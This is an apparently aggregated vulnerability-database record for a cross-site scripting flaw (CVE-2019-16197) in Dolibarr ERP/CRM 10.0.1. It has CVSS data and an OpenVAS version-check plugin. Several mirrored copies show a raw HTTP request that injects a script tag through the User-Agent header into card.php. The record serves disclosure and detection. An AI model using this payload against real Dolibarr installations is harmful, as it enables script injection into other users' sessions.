ID EDB-ID:47384 Type exploitdb Reporter Exploit-DB Modified 2019-09-13T00:00:00
Description
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================
Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.
GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
{"id": "EDB-ID:47384", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting", "description": "", "published": "2019-09-13T00:00:00", "modified": "2019-09-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/47384", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-16197"], "lastseen": "2019-09-13T11:39:22", "viewCount": 260, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-16197"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154481"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3793ED421A59523203B6C8A33A337495"]}, {"type": "github", "idList": ["GHSA-M553-9WMX-533H"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113533"]}, {"type": "zdt", "idList": ["1337DAY-ID-33252"]}], "modified": "2019-09-13T11:39:22", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2019-09-13T11:39:22", "rev": 2}, "vulnersScore": 4.3}, "sourceHref": "https://www.exploit-db.com/download/47384", "sourceData": "# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross\r\nSite Scripting\r\n# Exploit Author: Metin Yunus Kandemir (kandemir)\r\n# Vendor Homepage: https://www.dolibarr.org/\r\n# Software Link: https://www.dolibarr.org/downloads\r\n# Version: 10.0.1\r\n# Category: Webapps\r\n# Tested on: Xampp for Linux\r\n# CVE: CVE-2019-16197\r\n# Software Description : Dolibarr ERP & CRM is a modern and easy to use\r\nsoftware package to manage your business...\r\n==================================================================\r\n\r\nDescription: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of\r\nthe User-Agent HTTP header is copied into the HTML document as plain text\r\nbetween tags, leading to XSS.\r\n\r\nGET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert(\"XSS\")</script>", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-10-03T13:38:46", "description": "In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-09-16T13:15:00", "title": "CVE-2019-16197", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16197"], "modified": "2019-09-17T18:34:00", "cpe": ["cpe:/a:dolibarr:dolibarr:10.0.1"], "id": "CVE-2019-16197", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16197", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:dolibarr:dolibarr:10.0.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2019-09-13T21:36:43", "description": "", "published": "2019-09-13T00:00:00", "type": "packetstorm", "title": "Dolibarr ERP-CRM 10.0.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16197"], "modified": "2019-09-13T00:00:00", "id": "PACKETSTORM:154481", "href": "https://packetstormsecurity.com/files/154481/Dolibarr-ERP-CRM-10.0.1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting \n# Exploit Author: Metin Yunus Kandemir (kandemir) \n# Vendor Homepage: https://www.dolibarr.org/ \n# Software Link: https://www.dolibarr.org/downloads \n# Version: 10.0.1 \n# Category: Webapps \n# Tested on: Xampp for Linux \n# CVE: CVE-2019-16197 \n# Software Description : Dolibarr ERP & CRM is a modern and easy to use \nsoftware package to manage your business... \n================================================================== \n \nDescription: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of \nthe User-Agent HTTP header is copied into the HTML document as plain text \nbetween tags, leading to XSS. \n \nGET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert(\"XSS\")</script> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/154481/dolibarrerpcrm1001-xss.txt"}], "zdt": [{"lastseen": "2019-12-04T14:32:50", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-09-16T00:00:00", "title": "Dolibarr ERP-CRM 10.0.1 - User-Agent Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16197"], "modified": "2019-09-16T00:00:00", "id": "1337DAY-ID-33252", "href": "https://0day.today/exploit/description/33252", "sourceData": "# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross\r\nSite Scripting\r\n# Exploit Author: Metin Yunus Kandemir (kandemir)\r\n# Vendor Homepage: https://www.dolibarr.org/\r\n# Software Link: https://www.dolibarr.org/downloads\r\n# Version: 10.0.1\r\n# Category: Webapps\r\n# Tested on: Xampp for Linux\r\n# CVE: CVE-2019-16197\r\n# Software Description : Dolibarr ERP & CRM is a modern and easy to use\r\nsoftware package to manage your business...\r\n==================================================================\r\n\r\nDescription: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of\r\nthe User-Agent HTTP header is copied into the HTML document as plain text\r\nbetween tags, leading to XSS.\r\n\r\nGET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert(\"XSS\")</script>\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33252"}], "openvas": [{"lastseen": "2019-09-23T14:30:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-16197"], "description": "Dolibarr is prone to a cross-site scripting (XSS) vulnerability.", "modified": "2019-09-20T00:00:00", "published": "2019-09-17T00:00:00", "id": "OPENVAS:1361412562310113533", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113533", "type": "openvas", "title": "Dolibarr <= 10.0.1 XSS Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113533\");\n script_version(\"2019-09-20T07:02:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 07:02:27 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-17 11:01:29 +0000 (Tue, 17 Sep 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2019-16197\");\n\n script_name(\"Dolibarr <= 10.0.1 XSS Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dolibarr_detect.nasl\");\n script_mandatory_keys(\"dolibarr/detected\");\n\n script_tag(name:\"summary\", value:\"Dolibarr is prone to a cross-site scripting (XSS) vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The vulnerability exists within htdocs/societe/card.php,\n where the value of the User-Agent HTTP header is copied\n into the HTML document as plain text between tags.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker\n to inject arbitrary HTML and JavaScript into the site.\");\n script_tag(name:\"affected\", value:\"Dolibarr through version 10.0.1.\");\n script_tag(name:\"solution\", value:\"No known solution is available as of 17th September, 2019.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/154481/Dolibarr-ERP-CRM-10.0.1-Cross-Site-Scripting.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:dolibarr:dolibarr\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"10.0.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"None Available\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T20:39:54", "description": "\nDolibarr ERP-CRM 10.0.1 - User-Agent Cross-Site Scripting", "edition": 1, "published": "2019-09-13T00:00:00", "title": "Dolibarr ERP-CRM 10.0.1 - User-Agent Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16197"], "modified": "2019-09-13T00:00:00", "id": "EXPLOITPACK:3793ED421A59523203B6C8A33A337495", "href": "", "sourceData": "# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross\nSite Scripting\n# Exploit Author: Metin Yunus Kandemir (kandemir)\n# Vendor Homepage: https://www.dolibarr.org/\n# Software Link: https://www.dolibarr.org/downloads\n# Version: 10.0.1\n# Category: Webapps\n# Tested on: Xampp for Linux\n# CVE: CVE-2019-16197\n# Software Description : Dolibarr ERP & CRM is a modern and easy to use\nsoftware package to manage your business...\n==================================================================\n\nDescription: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of\nthe User-Agent HTTP header is copied into the HTML document as plain text\nbetween tags, leading to XSS.\n\nGET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert(\"XSS\")</script>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2020-03-10T23:25:58", "bulletinFamily": "software", "cvelist": ["CVE-2019-16197"], "description": "In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS.", "edition": 2, "modified": "2019-11-08T20:05:31", "published": "2019-11-08T20:05:31", "id": "GHSA-M553-9WMX-533H", "href": "https://github.com/advisories/GHSA-m553-9wmx-533h", "title": "Moderate severity vulnerability that affects dolibarr/dolibarr", "type": "github", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
